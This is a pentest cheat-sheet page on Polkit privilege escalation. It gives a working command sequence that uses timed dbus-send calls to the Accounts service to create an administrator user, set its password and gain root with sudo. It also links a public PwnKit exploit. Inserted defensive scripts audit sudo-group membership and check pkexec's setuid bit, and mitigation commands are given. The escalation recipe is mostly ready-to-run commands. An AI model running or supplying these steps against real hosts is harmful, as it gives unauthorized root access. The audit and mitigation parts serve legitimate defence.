PolKit Privilege Escalation
Last modified: 2023-07-24
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
Create a new user by sending a dbus message.
# string:tester: the new user, named "tester"
# string:"Tester Account": the description of the new user
# int32:1: account type 1 (administrator, i.e. placed in the sudo group)
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Then check the new user ID (uid).
id tester
uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
Generate a SHA-512 password hash for the new account.
# -6: SHA-512
openssl passwd -6 password123
Copy the output hash and use it as <password_hash> in the following command, which sets the password of the new user (User1000 matches the uid shown above).
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
Now change to root; when prompted, enter the password you created (e.g. "password123").
sudo -s # or sudo su root
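The sequence above ends with an account that is a member of the sudo group, which is what a defender should be looking for. The following is an added example, not part of the original page: a small POSIX shell audit that lists the members of privileged groups from a group file and filters out an allow-list of known administrators. The group file content (SAMPLE_GROUP), the function names, the group names and the allow-list are assumptions of this example; on a real host you would pass /etc/group instead of the constructed sample.

```shell
#!/bin/sh
# Added example (not from the original page): audit a group file for
# members of privileged groups so that an account added through the
# Accounts service stands out. SAMPLE_GROUP is constructed sample data;
# on a real host pass /etc/group to the functions instead.

SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,alice
sudo:x:27:alice,tester
users:x:100:
wheel:x:10:'

# privileged_members FILE GROUP...
# Prints "group:member" for every member of the named groups found in FILE.
privileged_members() {
    file=$1; shift
    for g in "$@"; do
        awk -F: -v g="$g" '$1 == g && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) print g ":" m[i]
        }' "$file"
    done
}

# unexpected_members FILE ALLOWLIST GROUP...
# Like privileged_members, but drops members named in ALLOWLIST
# (space-separated), leaving only accounts nobody has vouched for.
unexpected_members() {
    file=$1; allow=$2; shift 2
    privileged_members "$file" "$@" | while IFS=: read -r g m; do
        case " $allow " in
            *" $m "*) ;;                      # known administrator, skip
            *) printf '%s:%s\n' "$g" "$m" ;;  # unexpected privileged account
        esac
    done
}

main() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_GROUP" > "$tmp"
    echo "Privileged group members:"
    privileged_members "$tmp" sudo wheel adm
    echo "Not on the allow-list:"
    unexpected_members "$tmp" "alice" sudo wheel adm
    rm -f "$tmp"
}
main
```

With the constructed sample, the second listing reports only sudo:tester and adm:syslog; anything that appears there on a real host deserves a look at who created it and when.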
PwnKit is a local privilege escalation vulnerability in Polkit's pkexec.
Many public exploits exist. One example:
- https://github.com/Almorabea/pkexec-exploit (written in Python)
To mitigate the vulnerability, remove the setuid bit from the pkexec executable.
sudo chmod 0755 /usr/bin/pkexec # or sudo chmod 0755 `which pkexec`
Or simply upgrade the packages; most distributions ship versions patched for the vulnerability.
sudo apt update && sudo apt upgrade
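To verify that the first mitigation is in place, here is an added example that is not part of the original page: a POSIX shell check that reports whether a binary (pkexec on PATH by default) still carries the setuid bit. The function names and the temporary files created in demo are assumptions of this example; the demo exists only so the check can be exercised on a machine without pkexec.

```shell
#!/bin/sh
# Added example (not from the original page): check whether pkexec, or any
# given binary, still has the setuid bit that the mitigation above removes.

# is_setuid PATH -> exit 0 if PATH exists and has the setuid bit, 1 if not,
# 2 if PATH does not exist
is_setuid() {
    [ -e "$1" ] || return 2
    [ -n "$(find "$1" -prune -perm -4000 2>/dev/null)" ]
}

# report_pkexec [PATH] -> one-line verdict for PATH (default: pkexec on PATH);
# returns 1 when the setuid bit is still set so scripts can act on it
report_pkexec() {
    bin=${1:-$(command -v pkexec 2>/dev/null)}
    if [ -z "$bin" ]; then
        echo "pkexec: not installed"; return 0
    fi
    if is_setuid "$bin"; then
        echo "$bin: setuid bit set (mitigation not applied)"; return 1
    fi
    echo "$bin: not setuid"
}

# Exercise the check on constructed files (assumed names, not real binaries).
demo() {
    d=$(mktemp -d)
    : > "$d/suid";  chmod 4755 "$d/suid"   # mimics an unmitigated pkexec
    : > "$d/plain"; chmod 0755 "$d/plain"  # mimics pkexec after chmod 0755
    report_pkexec "$d/suid" || true
    report_pkexec "$d/plain"
    rm -rf "$d"
}
demo
```

Calling report_pkexec with no argument checks the installed pkexec; a non-zero exit status means the setuid bit is still present.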